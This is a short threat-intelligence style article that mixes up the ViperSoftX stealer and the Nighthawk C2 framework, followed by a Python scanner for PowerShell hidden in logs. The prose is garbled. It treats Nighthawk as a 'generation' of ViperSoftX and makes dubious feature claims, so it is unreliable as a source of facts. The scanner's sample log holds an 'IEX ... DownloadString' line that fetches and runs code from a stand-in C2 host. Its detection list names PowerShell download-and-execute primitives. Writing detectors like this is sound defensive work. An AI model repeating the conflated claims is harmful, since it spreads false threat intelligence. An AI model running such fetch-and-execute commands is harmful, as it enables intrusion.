
Nighthawk is an advanced C2 framework sold under commercial licence for red team operations.

ViperSoftX, a multi-stage stealer, exhibits interesting hiding capabilities: among others, it is concealed as a small single-line PowerShell script placed in the middle of an otherwise innocent-looking large log file. ViperSoftX focuses on stealing cryptocurrencies, clipboard swapping, fingerprinting the infected machine, and downloading and executing arbitrary additional payloads or executing commands.

Analysis of Nighthawk's PowerShell implementations shows that it implements several evasion techniques, including: hiding strings in hexadecimal form within variable names; randomizing the "main" function name for each variant; and using the two-byte representation ("\xXX") of ASCII characters to obfuscate strings in string constants. These techniques make it more difficult to identify malicious code when reviewing the source code, but still allow manual analysis and comparison with legitimate PowerShell scripts.
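The two hiding techniques described above (a one-line script buried in a large log file, and strings obfuscated as `\xXX` escapes or as hex digits inside variable names) can be surfaced with a simple scanner. The following is an added example written for this page; it is not code from the original article, from Avast, or from AlienVault. The log lines are constructed, the token list, the length-outlier rule (a line more than three times the median length) and the score threshold of 3 are assumptions chosen for illustration, and the decoders accept only hex that yields printable ASCII so that ordinary hex-looking variable names are not reported.

```python
import re
import statistics
from typing import Dict, List

# Constructed sample log: benign service entries plus one line carrying an
# inline PowerShell script. The obfuscation shapes follow the techniques
# described in the text (an escape-coded string constant and a hex-encoded
# variable name); the content itself is made up for this example.
SAMPLE_LOG: List[str] = [
    "2023-01-04 10:00:01 INFO service started",
    "2023-01-04 10:00:02 INFO heartbeat ok",
    "2023-01-04 10:00:03 INFO heartbeat ok",
    ('2023-01-04 10:00:04 INFO $v496e766f6b65 = "\\x49\\x45\\x58"; '
     "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')"),
    "2023-01-04 10:00:05 INFO heartbeat ok",
]

# Assumed indicator list: common PowerShell download/execute primitives.
POWERSHELL_TOKENS = re.compile(
    r"(?<![A-Za-z0-9])(?:IEX|Invoke-Expression|New-Object|DownloadString|"
    r"FromBase64String|Invoke-WebRequest|Start-Process|-EncodedCommand)\b",
    re.IGNORECASE,
)
# A run of at least three \xXX escapes, e.g. "\x49\x45\x58".
ESCAPED_STRING = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){3,}")
# A variable name whose tail is at least three hex byte pairs, e.g. $v496e766f6b65.
HEX_VARIABLE = re.compile(r"\$[A-Za-z_]*?((?:[0-9A-Fa-f]{2}){3,})(?![0-9A-Za-z_])")


def decode_escaped(text: str) -> str:
    """Turn a run of \\xXX escapes into the characters they encode."""
    return "".join(chr(int(h, 16)) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", text))


def _printable_ascii(data: bytes) -> bool:
    return all(0x20 <= c < 0x7F for c in data)


def decode_hex_variable_names(line: str) -> List[str]:
    """Recover strings hidden as hex in variable names ($v496e766f6b65 -> 'Invoke').

    Only decodings that are printable ASCII are kept, which suppresses names such
    as $deadbeef that merely look like hex.
    """
    found = []
    for hexpart in HEX_VARIABLE.findall(line):
        raw = bytes.fromhex(hexpart)
        if _printable_ascii(raw):
            found.append(raw.decode("ascii"))
    return found


def scan_log(lines: List[str]) -> List[Dict]:
    """Flag lines that look like inline PowerShell hidden among log entries.

    Two signals are combined: PowerShell/obfuscation tokens on the line, and the
    line being far longer than the file's typical entry (a script dropped into a
    log of uniform records stands out by length alone). The weights and the
    threshold are assumptions for this example, not tuned production values.
    """
    lengths = [len(line) for line in lines] or [0]
    median_len = statistics.median(lengths)
    findings = []
    for number, line in enumerate(lines, start=1):
        tokens = sorted({m.group(0) for m in POWERSHELL_TOKENS.finditer(line)})
        escaped = [decode_escaped(m.group(0)) for m in ESCAPED_STRING.finditer(line)]
        hexnames = decode_hex_variable_names(line)
        length_outlier = len(line) > 3 * median_len
        score = len(tokens) + 2 * len(escaped) + 2 * len(hexnames) + (1 if length_outlier else 0)
        if score >= 3:
            findings.append({
                "line": number,
                "score": score,
                "tokens": tokens,
                "decoded_escapes": escaped,
                "decoded_hex_names": hexnames,
                "length_outlier": length_outlier,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Running the block reports only line 4 of the constructed log, with the escaped constant decoded to `IEX` and the variable name decoded to `Invoke`; in practice the decoded strings are what an analyst would pivot on when comparing a suspicious script against legitimate PowerShell, since the obfuscation leaves the underlying cmdlet names intact.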

ViperSoftX's second generation of Nighthawk (version 2.6) aims to be a general-purpose framework for red team operations through the use of commercial licensing. The tool is modular, allowing the addition and removal of plug-ins depending on the target environment and actions to be performed, while retaining the core C2 infrastructure and API. The package has a dedicated commercial tier with additional features such as multi-threaded C2 responses, hiding PowerShell scripts in image files or VBScripts, smartURL support and extensive API documentation with examples for plug-in development.

Nighthawk's C2 infrastructure presents a new threat even to organizations that maintain their security by deploying systems with multiple layers of protection. The complexity of Nighthawk's network communication, combined with the many plug-ins available, makes it hard to detect and prevent once deployed in an organization's network. The difficulty is compounded by the fact that the client side is not detected by the typical behavioral defenses (e.g. signature-based IDS/IPS).

Source: ViperSoftX: Hiding in System Logs and Spreading VenomSoftX - AlienVault - Open Threat Exchange
